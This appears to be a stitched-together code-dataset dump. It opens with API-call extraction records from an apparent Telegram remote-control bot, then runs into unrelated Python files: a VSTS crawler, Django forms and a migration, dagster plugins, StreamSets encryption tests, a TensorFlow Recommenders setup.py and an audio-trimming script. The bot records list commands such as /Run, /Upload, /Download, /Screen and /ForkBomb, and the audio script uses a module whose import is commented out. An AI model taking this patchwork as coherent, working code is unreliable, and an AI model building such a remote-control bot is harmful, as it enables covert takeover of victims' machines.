((3798, 3828), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/CD\n🗂"""'], {}), "('/CD\\n🗂')\n", (3818, 3828), False, 'from telebot import types\n'), ((3839, 3873), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Upload\n📡"""'], {}), "('/Upload\\n📡')\n", (3859, 3873), False, 'from telebot import types\n'), ((3884, 3914), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/ls\n📄"""'], {}), "('/ls\\n📄')\n", (3904, 3914), False, 'from telebot import types\n'), ((3925, 3959), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Remove\n🗑"""'], {}), "('/Remove\\n🗑')\n", (3945, 3959), False, 'from telebot import types\n'), ((3970, 4006), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Download\n📨"""'], {}), "('/Download\\n📨')\n", (3990, 4006), False, 'from telebot import types\n'), ((4017, 4048), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Run\n📌"""'], {}), "('/Run\\n📌')\n", (4037, 4048), False, 'from telebot import types\n'), ((4059, 4090), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Cancel"""'], {}), "('/Cancel')\n", (4079, 4090), False, 'from telebot import types\n'), ((4193, 4220), 'telebot.types.ReplyKeyboardMarkup', 'types.ReplyKeyboardMarkup', ([], {}), '()\n', (4218, 4220), False, 'from telebot import types\n'), ((4231, 4261), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/5\n<<"""'], {}), "('/5\\n<<')\n", (4251, 4261), False, 'from telebot import types\n'), ((4272, 4302), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/6\n>>"""'], {}), "('/6\\n>>')\n", (4292, 4302), False, 'from telebot import types\n'), ((4313, 4347), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Screen\n🖼"""'], {}), "('/Screen\\n🖼')\n", (4333, 4347), False, 'from telebot import types\n'), ((4358, 4393), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Message\n💬"""'], {}), "('/Message\\n💬')\n", (4378, 4393), False, 'from telebot import types\n'), ((4404, 4437), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Speak\n📢"""'], {}), "('/Speak\\n📢')\n", (4424, 4437), False, 'from telebot import types\n'), ((4448, 4483), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/OpenURL\n🌐"""'], {}), "('/OpenURL\\n🌐')\n", (4468, 4483), False, 'from telebot import types\n'), ((4494, 4532), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Wallpapers\n🧩"""'], {}), "('/Wallpapers\\n🧩')\n", (4514, 4532), False, 'from telebot import types\n'), ((4543, 4579), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/ForkBomb\n⏱"""'], {}), "('/ForkBomb\\n⏱')\n", (4563, 4579), False, 'from telebot import types\n'), ((5152, 5162), 'sys.exit', 'sys.exit', ([], {}), '()\n', (5160, 5162), False, 'import sys, platform\n'), ((5582, 5592), 'sys.exit', 'sys.exit', ([], {}), '()\n', (5590, 5592), False, 'import sys, platform\n'), ((17750, 17789), 'requests.get', 'requests.get', (['URL'], {'allow_redirects': '(True)'}), '(URL, allow_redirects=True)\n', (17762, 17789), False, 'import requests\n'), ((35917, 35927), 'sys.exit', 'sys.exit', ([], {}), '()\n', (35925, 35927), False, 'import sys, platform\n'), ((13988, 14018), 'telebot.util.split_string', 'util.split_string', (['Dirse', '(4096)'], {}), '(Dirse, 4096)\n', (14005, 14018), False, 'from telebot import util\n'), ((30651, 30682), 'telebot.util.split_string', 'util.split_string', (['Output', '(4096)'], {}), '(Output, 4096)\n', (30668, 30682), False, 'from telebot import util\n'), ((8053, 8058), 'getmac.get_mac_address', 'gma', ([], {}), '()\n', (8056, 8058), True, 'from getmac import get_mac_address as gma\n')] |
'''
Repositories.py
From VSTS get the list of code repositories so we can
later crawl and link up pull request info and comments.
'''
# import logging
import configparser
from multiprocessing import Pool
from VSTSInfo import VstsInfo
from models import GraphBuilder, Repository, Project
class RepositoriesWorker(object):
"""
Gets the repository info from VSTS
"""
def __init__(self, request_info, vsts):
self.instance = vsts.instance
self.api_version = vsts.api_version
self.headers = vsts.get_request_headers()
self.vsts = vsts
def crawl(self, project_name):
"""
Gets Repositories for a given project
"""
url = ("%s/DefaultCollection/%s/_apis/git/repositories?api-version=%s" % (self.instance, project_name, self.api_version))
data = self.vsts.make_request(url)
for r in data["value"]:
graph = GraphBuilder().GetNewGraph()
#print(r["id"])
repo = Repository()
repo.Id = r.get("id")
repo.Name = r.get("name")
repo.Url = r.get("url")
raw_proj = r.get("project")
proj = Project()
proj.Id = raw_proj.get("id")
proj.Name = raw_proj.get("name")
proj.Url = raw_proj.get("url")
repo_proj = Project.select(graph, proj.Id)
'''todo: may not need to do this.'''
if repo_proj is not None:
proj_tx = graph.begin()
proj_tx.create(proj)
proj_tx.commit()
repo.BelongsTo.add(proj)
print("Adding Repo: ")
print(repo.Name)
transaction = graph.begin()
transaction.merge(repo)
transaction.graph.push(repo)
print("Finished mapping repos")
if __name__ == '__main__':
print("starting Repositories Crawl")
#set to false for easier debugging, but it is slower
run_multithreaded = True
GRAPH = GraphBuilder()
GRAPH.create_unique_constraints()
#If you feel your cache is up to date, then set ignore_cache to False.
VSTS = VstsInfo(None, None, ignore_cache=True)
PULL_REQUEST_STATUS = "Completed"
WORKER = RepositoriesWorker(VSTS.get_request_settings(), VSTS)
if run_multithreaded:
with Pool(5) as p:
p.map(WORKER.crawl, VSTS.project_whitelist)
else:
for proj in VSTS.project_whitelist:
WORKER.crawl(proj)
| [
"models.Project.select",
"models.Repository",
"models.GraphBuilder",
"VSTSInfo.VstsInfo",
"multiprocessing.Pool",
"models.Project"
] | [((1989, 2003), 'models.GraphBuilder', 'GraphBuilder', ([], {}), '()\n', (2001, 2003), False, 'from models import GraphBuilder, Repository, Project\n'), ((2129, 2168), 'VSTSInfo.VstsInfo', 'VstsInfo', (['None', 'None'], {'ignore_cache': '(True)'}), '(None, None, ignore_cache=True)\n', (2137, 2168), False, 'from VSTSInfo import VstsInfo\n'), ((988, 1000), 'models.Repository', 'Repository', ([], {}), '()\n', (998, 1000), False, 'from models import GraphBuilder, Repository, Project\n'), ((1169, 1178), 'models.Project', 'Project', ([], {}), '()\n', (1176, 1178), False, 'from models import GraphBuilder, Repository, Project\n'), ((1333, 1363), 'models.Project.select', 'Project.select', (['graph', 'proj.Id'], {}), '(graph, proj.Id)\n', (1347, 1363), False, 'from models import GraphBuilder, Repository, Project\n'), ((2314, 2321), 'multiprocessing.Pool', 'Pool', (['(5)'], {}), '(5)\n', (2318, 2321), False, 'from multiprocessing import Pool\n'), ((912, 926), 'models.GraphBuilder', 'GraphBuilder', ([], {}), '()\n', (924, 926), False, 'from models import GraphBuilder, Repository, Project\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
from django.contrib.auth import get_user_model
from ..models import UserProfile
User = get_user_model()
class UserForm(forms.ModelForm):
class Meta:
model = User
fields = ("username", "email", "is_active")
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ("location", "timezone", "is_verified", "is_administrator", "is_moderator") | [
"django.contrib.auth.get_user_model"
] | [((180, 196), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (194, 196), False, 'from django.contrib.auth import get_user_model\n')] |
from abc import ABCMeta, abstractmethod
import six
from dagster import check
class TypeStoragePlugin(six.with_metaclass(ABCMeta)): # pylint: disable=no-init
'''Base class for storage plugins.
Extend this class for (system_storage_name, dagster_type) pairs that need special handling.
'''
@classmethod
@abstractmethod
def compatible_with_storage_def(self, system_storage_def):
raise NotImplementedError()
@classmethod
@abstractmethod
def set_object(cls, intermediate_store, obj, context, dagster_type, paths):
raise NotImplementedError()
@classmethod
@abstractmethod
def get_object(cls, intermediate_store, context, dagster_type, paths):
raise NotImplementedError()
@classmethod
def required_resource_keys(cls):
return frozenset()
class TypeStoragePluginRegistry(object):
def __init__(self, types_to_register):
from dagster.core.types.dagster_type import DagsterType
types_to_register = check.opt_list_param(types_to_register, 'types_to_register', tuple)
self._registry = {}
for type_to_register, type_storage_plugin in types_to_register:
check.inst(type_to_register, DagsterType)
check.subclass(type_storage_plugin, TypeStoragePlugin)
self.register_type(type_to_register, type_storage_plugin)
def register_type(self, type_to_register, type_storage_plugin):
from dagster.core.types.dagster_type import DagsterType
check.inst_param(type_to_register, 'type_to_register', DagsterType)
check.subclass_param(type_storage_plugin, 'type_storage_plugin', TypeStoragePlugin)
check.invariant(
type_to_register.name is not None,
'Cannot register a type storage plugin for an anonymous type',
)
self._registry[type_to_register.name] = type_storage_plugin
def is_registered(self, dagster_type):
if dagster_type.name is not None and dagster_type.name in self._registry:
return True
return False
def get(self, name):
return self._registry.get(name)
def check_for_unsupported_composite_overrides(self, dagster_type):
from dagster.core.types.dagster_type import DagsterTypeKind
composite_overrides = {t.name for t in dagster_type.inner_types if t.name in self._registry}
if composite_overrides:
outer_type = 'composite type'
if dagster_type.kind == DagsterTypeKind.LIST:
if dagster_type.kind == DagsterTypeKind.NULLABLE:
outer_type = 'Optional List'
else:
outer_type = 'List'
elif dagster_type.kind == DagsterTypeKind.NULLABLE:
outer_type = 'Optional'
if len(composite_overrides) > 1:
plural = 's'
this = 'These'
has = 'have'
else:
plural = ''
this = 'This'
has = 'has'
check.not_implemented(
'You are attempting to store a {outer_type} containing type{plural} '
'{type_names} in a object store. {this} type{plural} {has} specialized storage '
'behavior (configured in the TYPE_STORAGE_PLUGIN_REGISTRY). We do not '
'currently support storing Nullables or Lists of types with customized '
'storage. See https://github.com/dagster-io/dagster/issues/1190 for '
'details.'.format(
outer_type=outer_type,
plural=plural,
this=this,
has=has,
type_names=', '.join([str(x) for x in composite_overrides]),
)
)
def construct_type_storage_plugin_registry(pipeline_def, system_storage_def):
# Needed to avoid circular dep
from dagster.core.definitions import PipelineDefinition, SystemStorageDefinition
check.inst_param(pipeline_def, 'pipeline_def', PipelineDefinition)
check.inst_param(system_storage_def, 'system_storage_def', SystemStorageDefinition)
type_plugins = []
for type_obj in pipeline_def.all_dagster_types():
for auto_plugin in type_obj.auto_plugins:
if auto_plugin.compatible_with_storage_def(system_storage_def):
type_plugins.append((type_obj, auto_plugin))
return TypeStoragePluginRegistry(type_plugins)
| [
"dagster.check.inst_param",
"dagster.check.opt_list_param",
"dagster.check.invariant",
"dagster.check.inst",
"dagster.check.subclass",
"six.with_metaclass",
"dagster.check.subclass_param"
] | [((105, 132), 'six.with_metaclass', 'six.with_metaclass', (['ABCMeta'], {}), '(ABCMeta)\n', (123, 132), False, 'import six\n'), ((3998, 4064), 'dagster.check.inst_param', 'check.inst_param', (['pipeline_def', '"""pipeline_def"""', 'PipelineDefinition'], {}), "(pipeline_def, 'pipeline_def', PipelineDefinition)\n", (4014, 4064), False, 'from dagster import check\n'), ((4069, 4156), 'dagster.check.inst_param', 'check.inst_param', (['system_storage_def', '"""system_storage_def"""', 'SystemStorageDefinition'], {}), "(system_storage_def, 'system_storage_def',\n SystemStorageDefinition)\n", (4085, 4156), False, 'from dagster import check\n'), ((1007, 1074), 'dagster.check.opt_list_param', 'check.opt_list_param', (['types_to_register', '"""types_to_register"""', 'tuple'], {}), "(types_to_register, 'types_to_register', tuple)\n", (1027, 1074), False, 'from dagster import check\n'), ((1509, 1576), 'dagster.check.inst_param', 'check.inst_param', (['type_to_register', '"""type_to_register"""', 'DagsterType'], {}), "(type_to_register, 'type_to_register', DagsterType)\n", (1525, 1576), False, 'from dagster import check\n'), ((1585, 1672), 'dagster.check.subclass_param', 'check.subclass_param', (['type_storage_plugin', '"""type_storage_plugin"""', 'TypeStoragePlugin'], {}), "(type_storage_plugin, 'type_storage_plugin',\n TypeStoragePlugin)\n", (1605, 1672), False, 'from dagster import check\n'), ((1677, 1794), 'dagster.check.invariant', 'check.invariant', (['(type_to_register.name is not None)', '"""Cannot register a type storage plugin for an anonymous type"""'], {}), "(type_to_register.name is not None,\n 'Cannot register a type storage plugin for an anonymous type')\n", (1692, 1794), False, 'from dagster import check\n'), ((1188, 1229), 'dagster.check.inst', 'check.inst', (['type_to_register', 'DagsterType'], {}), '(type_to_register, DagsterType)\n', (1198, 1229), False, 'from dagster import check\n'), ((1242, 1296), 'dagster.check.subclass', 'check.subclass', (['type_storage_plugin', 'TypeStoragePlugin'], {}), '(type_storage_plugin, TypeStoragePlugin)\n', (1256, 1296), False, 'from dagster import check\n')] |
import sys
import base_func as base
import twint
from similar_hashtags import similar_hashtags
from top_mentions_hashtags import top_mentions_hashtags as mentions
def basic(username,search):
base.get_user_bio(username,search)
base.get_user_tweets(username,search,True)
def get_keyword(key,limit=100):
base.get_tweets(key,limit)
def top_mention():
key_val = int(input('no of users'))
seed_user = list(map(str,input('Enter usernames').strip().split()))[:key_val]
limit = int(input('No of tweets to be pulled')) # default limit = 500
for username in seed_user:
mentions.get_top_mentions_hashtags(username)
def similar_hashtag():
key_val = int(input('no of hastags'))
seed_hash = list(map(str,input('Enter hashtags').strip().split()))[:key_val]
limit = int(input('No of tweets to be pulled')) # default limit = 500
for seed_hashtag in seed_hash:
similar_hashtags.get_similar_hashtags(seed_hashtag, limit)
if __name__ == "__main__":
username = sys.argv[1]
string = sys.argv[2]
basic(username,string) | [
"base_func.get_user_bio",
"base_func.get_user_tweets",
"similar_hashtags.similar_hashtags.get_similar_hashtags",
"base_func.get_tweets",
"top_mentions_hashtags.top_mentions_hashtags.get_top_mentions_hashtags"
] | [((197, 232), 'base_func.get_user_bio', 'base.get_user_bio', (['username', 'search'], {}), '(username, search)\n', (214, 232), True, 'import base_func as base\n'), ((236, 280), 'base_func.get_user_tweets', 'base.get_user_tweets', (['username', 'search', '(True)'], {}), '(username, search, True)\n', (256, 280), True, 'import base_func as base\n'), ((316, 343), 'base_func.get_tweets', 'base.get_tweets', (['key', 'limit'], {}), '(key, limit)\n', (331, 343), True, 'import base_func as base\n'), ((602, 646), 'top_mentions_hashtags.top_mentions_hashtags.get_top_mentions_hashtags', 'mentions.get_top_mentions_hashtags', (['username'], {}), '(username)\n', (636, 646), True, 'from top_mentions_hashtags import top_mentions_hashtags as mentions\n'), ((914, 972), 'similar_hashtags.similar_hashtags.get_similar_hashtags', 'similar_hashtags.get_similar_hashtags', (['seed_hashtag', 'limit'], {}), '(seed_hashtag, limit)\n', (951, 972), False, 'from similar_hashtags import similar_hashtags\n')] |
# Copyright 2019 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import logging
import pytest
from streamsets.testframework.markers import aws, sdc_min_version
from streamsets.testframework.utils import get_random_string
from streamsets.testframework.utils import Version
logger = logging.getLogger(__name__)
MESSAGE_TEXT = 'ABCDEF'
@pytest.fixture(scope='module')
def sdc_common_hook():
def hook(data_collector):
data_collector.add_stage_lib('streamsets-datacollector-crypto-lib')
return hook
@aws('kms')
@sdc_min_version('3.5.0')
def test_field_decrypt(sdc_builder, sdc_executor, aws):
"""Basic test to verify Encrypt and Decrypt Fields processor can decrypt a field.
An encrypted field is sent and after pipeline is run, verification of decryption is done using wiretap.
ciphertext is a byte array, but raw data source provides no way to specify a byte array.
Hence a base64 encoded string of the ciphertext is used.
Once it has been loaded by the raw data source, it needs to be decoded back into a byte array
for input to the encryption processor.
The base64 decode processor requires a byte array to decode instead of a string,
hence the field type converter.
(https://streamsets.com/documentation/datacollector/latest/help/datacollector/UserGuide/Processors/Base64Decoder.html#concept_ujj_spy_kv)
The pipeline looks like:
dev_raw_data_source >> field_type_converter >> base64_decoder >> field_decrypt >> wiretap
"""
expected_plaintext = MESSAGE_TEXT.encode()
ciphertext, _ = aws.encrypt(expected_plaintext)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON',
raw_data=json.dumps({'message': base64.b64encode(ciphertext).decode()}),
stop_after_first_batch=True)
field_type_converter = pipeline_builder.add_stage('Field Type Converter', type='processor')
field_type_converter_configs = [{'fields': ['/message'], 'targetType': 'BYTE_ARRAY'}]
field_type_converter.set_attributes(conversion_method='BY_FIELD',
field_type_converter_configs=field_type_converter_configs)
base64_decoder = pipeline_builder.add_stage('Base64 Field Decoder', type='processor')
if Version(sdc_builder.version) < Version("4.4.0"):
base64_decoder.set_attributes(field_to_decode='/message', target_field='/message')
else:
base64_decoder.set_attributes(
fields_to_decode=[{'originFieldPath': '/message', 'resultFieldPath': '/message'}]
)
field_decrypt = pipeline_builder.add_stage('Encrypt and Decrypt Fields', type='processor')
field_decrypt.set_attributes(cipher='ALG_AES_256_GCM_IV12_TAG16_HKDF_SHA384_ECDSA_P384',
fields=['/message'],
frame_size=4096,
mode='DECRYPT')
wiretap = pipeline_builder.add_wiretap()
dev_raw_data_source >> field_type_converter >> base64_decoder >> field_decrypt >> wiretap.destination
pipeline = pipeline_builder.build('Field Decryption Pipeline').configure_for_environment(aws)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
actual_value = wiretap.output_records[0].get_field_data('/message')
assert actual_value == expected_plaintext
@aws('kms')
@sdc_min_version('3.5.0')
def test_field_encrypt(sdc_builder, sdc_executor, aws):
"""Baic test to verify Encrypt and Decrypt Fields processor can encrypt.
Verify by decrypting the field received from pipeline wiretap.
The pipeline looks like:
dev_raw_data_source >> field_encrypt >> wiretap
"""
expected_plaintext = MESSAGE_TEXT.encode()
raw_data = json.dumps(dict(message=MESSAGE_TEXT))
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON', raw_data=raw_data, stop_after_first_batch=True)
field_encrypt = pipeline_builder.add_stage('Encrypt and Decrypt Fields', type='processor')
field_encrypt.set_attributes(cipher='ALG_AES_256_GCM_IV12_TAG16_HKDF_SHA384_ECDSA_P384',
data_key_caching=False,
fields=['/message'],
frame_size=4096,
mode='ENCRYPT')
wiretap = pipeline_builder.add_wiretap()
dev_raw_data_source >> field_encrypt >> wiretap.destination
pipeline = pipeline_builder.build('Field Encryption Pipeline').configure_for_environment(aws)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
ciphertext_encoded = wiretap.output_records[0].get_field_data('/message')
# Decrypt received value using aws_encryption_sdk for verification purpose.
actual_value, _ = aws.decrypt(ciphertext_encoded.value)
assert actual_value == expected_plaintext
@sdc_min_version('3.17.0')
def test_field_encrypt_el(sdc_builder, sdc_executor):
"""Test to verify that EL functions work by using Base64 EL
Use processor to encrypt and decrypt data with a random key that
is encoded using an EL
The pipeline looks like:
dev_raw_data_source >> field_encrypt >> field_decrypt >> wiretap
"""
expected_plaintext = MESSAGE_TEXT
raw_data = json.dumps(dict(message=MESSAGE_TEXT))
key = get_random_string(length=32)
key_el = "${base64:encodeString('" + key + "', false, 'utf-8')}"
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON', raw_data=raw_data, stop_after_first_batch=True)
field_encrypt = pipeline_builder.add_stage('Encrypt and Decrypt Fields', type='processor')
field_encrypt.set_attributes(cipher='ALG_AES_256_GCM_IV12_TAG16_NO_KDF',
base64_encoded_key=key_el,
data_key_caching=False,
frame_size=4096,
mode='ENCRYPT',
fields=['/message'])
field_decrypt = pipeline_builder.add_stage('Encrypt and Decrypt Fields', type='processor')
field_decrypt.set_attributes(cipher='ALG_AES_256_GCM_IV12_TAG16_NO_KDF',
base64_encoded_key=key_el,
data_key_caching=False,
frame_size=4096,
mode='DECRYPT',
fields=['/message'])
wiretap = pipeline_builder.add_wiretap()
dev_raw_data_source >> field_encrypt >> field_decrypt >> wiretap.destination
pipeline = pipeline_builder.build('Field Encryption Pipeline Base64 EL')
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
decrypted_value = wiretap.output_records[0].get_field_data('/message')
assert decrypted_value == expected_plaintext
| [
"logging.getLogger",
"base64.b64encode",
"streamsets.testframework.markers.sdc_min_version",
"streamsets.testframework.utils.get_random_string",
"pytest.fixture",
"streamsets.testframework.markers.aws",
"streamsets.testframework.markers.aws.encrypt",
"streamsets.testframework.markers.aws.decrypt",
"... | [((824, 851), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (841, 851), False, 'import logging\n'), ((880, 910), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (894, 910), False, 'import pytest\n'), ((1059, 1069), 'streamsets.testframework.markers.aws', 'aws', (['"""kms"""'], {}), "('kms')\n", (1062, 1069), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((1071, 1095), 'streamsets.testframework.markers.sdc_min_version', 'sdc_min_version', (['"""3.5.0"""'], {}), "('3.5.0')\n", (1086, 1095), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((4079, 4089), 'streamsets.testframework.markers.aws', 'aws', (['"""kms"""'], {}), "('kms')\n", (4082, 4089), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((4091, 4115), 'streamsets.testframework.markers.sdc_min_version', 'sdc_min_version', (['"""3.5.0"""'], {}), "('3.5.0')\n", (4106, 4115), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((5731, 5756), 'streamsets.testframework.markers.sdc_min_version', 'sdc_min_version', (['"""3.17.0"""'], {}), "('3.17.0')\n", (5746, 5756), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((2109, 2140), 'streamsets.testframework.markers.aws.encrypt', 'aws.encrypt', (['expected_plaintext'], {}), '(expected_plaintext)\n', (2120, 2140), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((5644, 5681), 'streamsets.testframework.markers.aws.decrypt', 'aws.decrypt', (['ciphertext_encoded.value'], {}), '(ciphertext_encoded.value)\n', (5655, 5681), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((6186, 6214), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {'length': '(32)'}), '(length=32)\n', (6203, 6214), False, 'from streamsets.testframework.utils import get_random_string\n'), ((2969, 2997), 'streamsets.testframework.utils.Version', 'Version', (['sdc_builder.version'], {}), '(sdc_builder.version)\n', (2976, 2997), False, 'from streamsets.testframework.utils import Version\n'), ((3000, 3016), 'streamsets.testframework.utils.Version', 'Version', (['"""4.4.0"""'], {}), "('4.4.0')\n", (3007, 3016), False, 'from streamsets.testframework.utils import Version\n'), ((2406, 2434), 'base64.b64encode', 'base64.b64encode', (['ciphertext'], {}), '(ciphertext)\n', (2422, 2434), False, 'import base64\n')] |
# Generated by Django 2.2.5 on 2019-10-08 21:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('starboardscanner_app', '0002_auto_20191008_2338'),
]
operations = [
migrations.AlterField(
model_name='record',
name='created_by',
field=models.CharField(max_length=50),
),
]
| [
"django.db.models.CharField"
] | [((353, 384), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (369, 384), False, 'from django.db import migrations, models\n')] |
# Copyright 2021 The TensorFlow Recommenders Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TensorFlow Recommenders, a TensorFlow library for recommender systems."""
import pathlib
import setuptools
VERSION = "0.5.2"
long_description = (pathlib.Path(__file__).parent
.joinpath("README.md")
.read_text())
setuptools.setup(
name="tensorflow-recommenders",
version=VERSION,
description="Tensorflow Recommenders, a TensorFlow library for recommender systems.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/tensorflow/recommenders",
author="Google Inc.",
author_email="<EMAIL>",
packages=setuptools.find_packages(),
install_requires=pathlib.Path("requirements.txt").read_text().splitlines(),
extras_require={
"docs": [
"fire",
"annoy",
"scann == 1.2.*",
],
},
# PyPI package information.
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
],
license="Apache 2.0",
keywords="tensorflow recommenders recommendations",
)
| [
"setuptools.find_packages",
"pathlib.Path"
] | [((1236, 1262), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (1260, 1262), False, 'import setuptools\n'), ((752, 774), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (764, 774), False, 'import pathlib\n'), ((1285, 1317), 'pathlib.Path', 'pathlib.Path', (['"""requirements.txt"""'], {}), "('requirements.txt')\n", (1297, 1317), False, 'import pathlib\n')] |
# 3/28/2020 Convert Nested JSON to Pandas DataFrame and Flatten List in a Column
# https://gist.github.com/rafaan/4ddc91ae47ea46a46c0b
# 6/25/2020 Initial
# 7/7/2020 Merge test_stort3Qdb.py and test_query3Qtable.py
########################################################
import json
from pandas.io.json import json_normalize
import pandas as pd
import os,sys,time,platform
strabspath=os.path.abspath(__file__)
strdirname=os.path.dirname(strabspath)
str_split=os.path.split(strdirname)
prevdirname=str_split[0]
dirnamelib=os.path.join(prevdirname,"lib")
dirnamelog=os.path.join(prevdirname,"logs")
sys.path.append(dirnamelib)
from logger import logger
from libCSV import *
import csvdataAnalysis as csvdata_analysis
import db_sqlite as db_sqlite
#import func_split_3channel as func_split_3ch
def trim_all_noise_wav(data,opt_verbose='OFF'):
ref_fpath_16K = data["trim_ref_info"]['ref_fpath_16K']
ref_fpath_48K = data["trim_ref_info"]['ref_fpath_48K']
add_key = 'dut'
msg = 'data["trim_ref_info"][\'ref_fpath_16K\']: {}'
logger.info(msg.format(data["trim_ref_info"]['ref_fpath_16K']))
msg = 'data["trim_ref_info"][\'ref_fpath_48K\']: {}'
logger.info(msg.format(data["trim_ref_info"]['ref_fpath_48K']))
for i,_3quest in enumerate(data["3Quest"]):
if (data["3Quest"][i]['label_dut'] != '' and data["3Quest"][i]['label_standmic'] != ''\
and os.path.isfile(data["3Quest"][i]['mic_dut']) \
and os.path.isfile(data["3Quest"][i]['mic_standmic'])):#bypass without labels and dut, standmic wav file
#opt_verbose='ON'
#opt_verbose='OFF'
func_split_3ch.mkdir_folder(data["3Quest"][i]['path_dut'])
msg = 'data["3Quest"][{}][\'mic_dut\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['mic_dut']))
msg = 'data["3Quest"][{}][\'label_dut\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['label_dut']))
start_time, end_time, label = func_split_3ch.load_label_file(data["3Quest"][i]['label_dut'])
msg = 'data["3Quest"][{}][\'gain_dut\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['gain_dut']))
msg = 'data["3Quest"][{}][\'channel_dut\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['channel_dut']))
if (data["3Quest"][i]['channel_dut'] == 1):
func_split_3ch.func_gen_dut_wav_from_mono(data["3Quest"][i]['path_dut'], \
ref_fpath_16K, ref_fpath_48K, \
data["3Quest"][i]['mic_dut'], \
start_time, label, \
data["3Quest"][i]['gain_dut'], \
add_key, opt_verbose)
elif (data["3Quest"][i]['channel_dut'] == 2):
func_split_3ch.func_gen_dut_wav_from_stereo(data["3Quest"][i]['path_dut'], \
ref_fpath_16K, ref_fpath_48K, \
data["3Quest"][i]['mic_dut'], \
start_time, label, \
data["3Quest"][i]['gain_dut'], \
add_key, opt_verbose)
#msg = 'data["3Quest"][{}][\'path_standmic\']: {}'
#logger.info(msg.format(i,data["3Quest"][i]['path_standmic']))
func_split_3ch.mkdir_folder(data["3Quest"][i]['path_standmic'])
msg = 'data["3Quest"][{}][\'mic_standmic\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['mic_standmic']))
msg = 'data["3Quest"][{}][\'label_standmic\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['label_standmic']))
msg = 'data["3Quest"][{}][\'gain_standmic\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['gain_standmic']))
start_time, end_time, label = func_split_3ch.load_label_file(data["3Quest"][i]['label_standmic'])
func_split_3ch.func_gen_standmic_wav(data["3Quest"][i]['path_standmic'], \
ref_fpath_16K, ref_fpath_48K, \
data["3Quest"][i]['mic_standmic'], \
start_time, label, \
data["3Quest"][i]['gain_standmic'], \
opt_verbose)
else:
msg = 'Please check data["3Quest"][{}][\'mic_dut\']:{} if exist or not?'
logger.info(msg.format(i, data["3Quest"][i]['mic_dut']))
msg = 'Please check data["3Quest"][{}][\'mic_standmic\']:{} if exist or not?'
logger.info(msg.format(i, data["3Quest"][i]['mic_standmic']))
